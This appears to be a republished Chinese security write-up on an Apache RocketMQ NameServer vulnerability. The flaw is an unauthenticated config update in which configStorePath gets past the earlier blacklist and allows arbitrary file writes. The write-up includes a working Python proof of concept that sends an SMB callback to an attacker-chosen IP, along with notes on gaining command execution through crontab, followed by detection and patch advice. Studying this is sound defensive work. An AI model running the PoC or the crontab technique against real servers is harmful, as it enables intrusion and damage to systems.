Apache RocketMQ 是一款开源的分布式消息系统,基于高可用分布式集群技术,提供低延时的、高可靠的消息发布与订阅服务。同时,广泛应用于多个领域,包括异步通信解耦、企业解决方案、金融支付、电信、电子商务、快递物流、广告营销、社交、即时通信、移动应用、手游、视频、物联网、车联网等
在满足利用条件时,攻击者可以通过构造恶意的对象来实现任意文件写入,通过对Linux系统写入crontab的方式即可实现任意命令执行。
组件自定义协议;socket传输
import socket
import binascii
import random
import string
print("注意,此POC在特定情况下为有损探测,danger: true")
def generate_random_string(length):
characters = string.ascii_letters + string.digits
random_string = ''.join(random.choice(characters) for _ in range(length))
return random_string
random_str = generate_random_string(8)
client = socket.socket()
env=input("目标操作系统是 1:Windows 还是 2:Linux 请输入序号:")
ip=input("请输入目标ip:")
if env=='1':
SMBip=input("请输入用于接收SMB请求的ip(需要开启445监听):")
body=('configStorePath=\\\\\\\\'+SMBip+'\\\\test\n').encode('utf-8')
elif env=='2':
body=('\nconfigStorePath=\n').encode('utf-8')
else:
print("输入错误!")
exit()
client.connect((ip,9876))
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
head1 = '00000000'+str(hex(json_lens))[2:]
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
if b'"remark":"Can not update config path"' in data_recv:
print("漏洞不存在!")
elif (b'"serializeTypeCurrentRPC":"JSON"' in data_recv) & (b'"flag":1' in data_recv):
print("漏洞存在!")
else:
print("漏洞不存在!")
打入POC后,调用栈如下
write:313, FileOutputStream (java.io)
writeStringToFile:151, IOTinyUtils (org.apache.rocketmq.common.utils)
string2FileNotSafe:203, MixAll (org.apache.rocketmq.common)
string2File:194, MixAll (org.apache.rocketmq.common)
persist:212, Configuration (org.apache.rocketmq.remoting)
update:202, Configuration (org.apache.rocketmq.remoting)
updateConfig:636, DefaultRequestProcessor (org.apache.rocketmq.namesrv.processor)
processRequest:132, DefaultRequestProcessor (org.apache.rocketmq.namesrv.processor)
lambda$buildProcessRequestHandler$1:313, NettyRemotingAbstract (org.apache.rocketmq.remoting.netty)
run:-1, 442829052 (org.apache.rocketmq.remoting.netty.NettyRemotingAbstract$$Lambda$97)
run:80, RequestTask (org.apache.rocketmq.remoting.netty)
call:511, Executors$RunnableAdapter (java.util.concurrent)
run:266, FutureTask (java.util.concurrent)
runWorker:1149, ThreadPoolExecutor (java.util.concurrent)
run:624, ThreadPoolExecutor$Worker (java.util.concurrent)
run:750, Thread (java.lang)
@Override
public void run() {
if (!this.stopRun)
this.runnable.run();
}
可以看到,这里调用了runnable的run方法,通过IDEA查看runnable属性
在arg3中存放了POC里的内容
body里就是后续要和allconfigs合并的、POC可控的配置内容
@Override
public RemotingCommand processRequest(ChannelHandlerContext ctx,
RemotingCommand request) throws RemotingCommandException {
if (ctx != null) {
log.debug("receive request, {} {} {}",
request.getCode(),
RemotingHelper.parseChannelRemoteAddr(ctx.channel()),
request);
}
switch (request.getCode()) {
case RequestCode.PUT_KV_CONFIG:
return this.putKVConfig(ctx, request);
case RequestCode.GET_KV_CONFIG:
return this.getKVConfig(ctx, request);
case RequestCode.DELETE_KV_CONFIG:
return this.deleteKVConfig(ctx, request);
case RequestCode.QUERY_DATA_VERSION:
return this.queryBrokerTopicConfig(ctx, request);
case RequestCode.REGISTER_BROKER:
return this.registerBroker(ctx, request);
case RequestCode.UNREGISTER_BROKER:
return this.unregisterBroker(ctx, request);
case RequestCode.BROKER_HEARTBEAT:
return this.brokerHeartbeat(ctx, request);
case RequestCode.GET_BROKER_MEMBER_GROUP:
return this.getBrokerMemberGroup(ctx, request);
case RequestCode.GET_BROKER_CLUSTER_INFO:
return this.getBrokerClusterInfo(ctx, request);
case RequestCode.WIPE_WRITE_PERM_OF_BROKER:
return this.wipeWritePermOfBroker(ctx, request);
case RequestCode.ADD_WRITE_PERM_OF_BROKER:
return this.addWritePermOfBroker(ctx, request);
case RequestCode.GET_ALL_TOPIC_LIST_FROM_NAMESERVER:
return this.getAllTopicListFromNameserver(ctx, request);
case RequestCode.DELETE_TOPIC_IN_NAMESRV:
return this.deleteTopicInNamesrv(ctx, request);
case RequestCode.REGISTER_TOPIC_IN_NAMESRV:
return this.registerTopicToNamesrv(ctx, request);
case RequestCode.GET_KVLIST_BY_NAMESPACE:
return this.getKVListByNamespace(ctx, request);
case RequestCode.GET_TOPICS_BY_CLUSTER:
return this.getTopicsByCluster(ctx, request);
case RequestCode.GET_SYSTEM_TOPIC_LIST_FROM_NS:
return this.getSystemTopicListFromNs(ctx, request);
case RequestCode.GET_UNIT_TOPIC_LIST:
return this.getUnitTopicList(ctx, request);
case RequestCode.GET_HAS_UNIT_SUB_TOPIC_LIST:
return this.getHasUnitSubTopicList(ctx, request);
case RequestCode.GET_HAS_UNIT_SUB_UNUNIT_TOPIC_LIST:
return this.getHasUnitSubUnUnitTopicList(ctx, request);
case RequestCode.UPDATE_NAMESRV_CONFIG:
return this.updateConfig(ctx, request);
case RequestCode.GET_NAMESRV_CONFIG:
return this.getConfig(ctx, request);
case RequestCode.GET_CLIENT_CONFIG:
return this.getClientConfigs(ctx, request);
default:
String error = " request type " + request.getCode() + " not supported";
return RemotingCommand.createResponseCommand(RemotingSysResponseCode.REQUEST_CODE_NOT_SUPPORTED, error);
}
}
很明显是用来处理请求的,根据不同的Code
执行不同的操作;找到RequestCode,这次漏洞的触发点是在update_namesrv_config功能上,所以POC里的Code选择318
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
还注意到一点:方法的类名叫RemotingCommand
再看这些操作的具体效果(deleteTopicInNamesrv),不难看出,这是给管理员使用的后台接口,但因为缺少鉴权,造成了漏洞
private RemotingCommand updateConfig(ChannelHandlerContext ctx, RemotingCommand request) {
if (ctx != null) {
log.info("updateConfig called by {}", RemotingHelper.parseChannelRemoteAddr(ctx.channel()));
}
final RemotingCommand response = RemotingCommand.createResponseCommand(null);
byte[] body = request.getBody();
if (body != null) {
String bodyStr;
try {
bodyStr = new String(body, MixAll.DEFAULT_CHARSET);
} catch (UnsupportedEncodingException e) {
log.error("updateConfig byte array to string error: ", e);
response.setCode(ResponseCode.SYSTEM_ERROR);
response.setRemark("UnsupportedEncodingException " + e);
return response;
}
Properties properties = MixAll.string2Properties(bodyStr);
if (properties == null) {
log.error("updateConfig MixAll.string2Properties error {}", bodyStr);
response.setCode(ResponseCode.SYSTEM_ERROR);
response.setRemark("string2Properties error");
return response;
}
if (properties.containsKey("kvConfigPath") || properties.containsKey("configStorePathName")) {
response.setCode(ResponseCode.NO_PERMISSION);
response.setRemark("Can not update config path");
return response;
}
this.namesrvController.getConfiguration().update(properties);
}
response.setCode(ResponseCode.SUCCESS);
response.setRemark(null);
return response;
}
从request中拿到body,解码,转换为properties,以及安全检查:
if (properties.containsKey("kvConfigPath") || properties.containsKey("configStorePathName"))
这里给的黑名单是kvConfigPath
和configStorePathName
,用于修复上个漏洞(CVE-2023-33246)
因为这次使用configStorePath
来指定config写入路径,所以能通过检查
public void update(Properties properties) {
try {
readWriteLock.writeLock().lockInterruptibly();
try {
// the property must be exist when update
mergeIfExist(properties, this.allConfigs);
for (Object configObject : configObjectList) {
// not allConfigs to update...
MixAll.properties2Object(properties, configObject);
}
this.dataVersion.nextVersion();
} finally {
readWriteLock.writeLock().unlock();
}
} catch (InterruptedException e) {
log.error("update lock error, {}", properties);
return;
}
persist();
}
在mergeIfExist(properties, this.allConfigs);
处就会进行合并操作,allConfigs
相当于config缓存,每次update操作后都会更新,但重启之后会恢复默认
再就是把properties
的值通过properties2Object
方法赋给configObject
注意,这个地方会把request里的**configStorePath
**也赋给configObject对象, 而这个对象和后面的**storePathObject
**是同一个**nameSrvConfig
**对象
public void persist() {
try {
readWriteLock.readLock().lockInterruptibly();
try {
String allConfigs = getAllConfigsInternal();
MixAll.string2File(allConfigs, getStorePath());
} catch (IOException e) {
log.error("persist string2File error, ", e);
} finally {
readWriteLock.readLock().unlock();
}
} catch (InterruptedException e) {
log.error("persist lock error");
}
}
这里先创建一个allConfigs
变量,要注意这是新创建的方法内部变量,而不是Configuration类的那个allConfigs
属性;
变量值为getAllConfigsInternal()
方法的返回值,跟进方法:
private String getAllConfigsInternal() {
StringBuilder stringBuilder = new StringBuilder();
// reload from config object ?
for (Object configObject : this.configObjectList) {
Properties properties = MixAll.object2Properties(configObject);
if (properties != null) {
merge(properties, this.allConfigs);
} else {
log.warn("getAllConfigsInternal object2Properties is null, {}", configObject.getClass());
}
}
{
stringBuilder.append(MixAll.properties2String(this.allConfigs, true));
}
return stringBuilder.toString();
}
这里的操作也很简单,先把之前的object转回properties,然后和this.allConfigs
合并(但之前已经把preperties和this.allconfigs
合并过了,这里应该是一种容错机制,如果this.allconfigs
不存在就和configObjectList
里存的config合并;configObjectList
会在每次启动的时候初始化, 比如namesrv-config就会设置为NamesrvConfig
里面的默认值;) 最后转回String并返回
getStorePath()
private String getStorePath() {
String realStorePath = null;
try {
readWriteLock.readLock().lockInterruptibly();
try {
realStorePath = this.storePath;
if (this.storePathFromConfig) {
try {
realStorePath = (String) storePathField.get(this.storePathObject);
} catch (IllegalAccessException e) {
log.error("getStorePath error, ", e);
}
}
} finally {
readWriteLock.readLock().unlock();
}
} catch (InterruptedException e) {
log.error("getStorePath lock error");
}
return realStorePath;
}
这里实际是利用反射,从storePathObject这个对象中获得写入路径;
注意,这个对象和configObjectList里的那个名为configObject的对象是同一个namesrvConfig类对象,路径是在前面的**properties2Object
**方法里从**properties
(即request里的body)中获取并赋值的,也因此可以任意控制config的写入路径**
string2File
方法public static synchronized void string2File(final String str, final String fileName) throws IOException {
String bakFile = fileName + ".bak";
String prevContent = file2String(fileName);
if (prevContent != null) {
string2FileNotSafe(prevContent, bakFile);
}
string2FileNotSafe(str, fileName);
}
里面的逻辑很简单, 如果需要覆盖写入,就先备份,然后写入bak备份,再覆盖写入config
string2FileNotSafe
看名字就知道是最终的执行方法,点进去看看
public static void string2FileNotSafe(final String str, final String fileName) throws IOException {
File file = new File(fileName);
File fileParent = file.getParentFile();
if (fileParent != null) {
fileParent.mkdirs();
}
IOTinyUtils.writeStringToFile(file, str, "UTF-8");
}
可以执行向任意路径写任意文件的操作;
但因为mkdirs的存在,就不能通过往/dev/tcp里面写文件来弹shell了;
如果是windows环境,可以用UNC路径来发SMB请求;
当然也可以写crontab来getshell;
该组件使用自定义协议
使用configStorePath
即可绕过为了修复上个版本漏洞而添加的黑名单(在下个版本中该参数也被加入黑名单,则暂无绕过方式)
检测规则:
若目标处在Windows环境下,则可以使用UNC路径令其向指定IP发送SMB请求,VPS开启445端口即可检测;
若处于Linux环境下,则需对返回包进行判断,在漏洞已被修复的高版本下,返回包中会包含"remark":"Can not update config path"
的键值对
注意,基于第三部分对该组件运行逻辑的分析,POC有一定概率对目标造成损害,具体有以下几种情况:
插件编写:
见 2.3 漏洞复现
如果检测到目标Response符合要求时,判断攻击成功。
官方已发布了最新版本来修复该漏洞,请升级至最新版本。
在DefaultRequestProcessor.updateConfigL630
处,添加对Request中configStorePath的过滤
无
https://paper.seebug.org/2081/
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。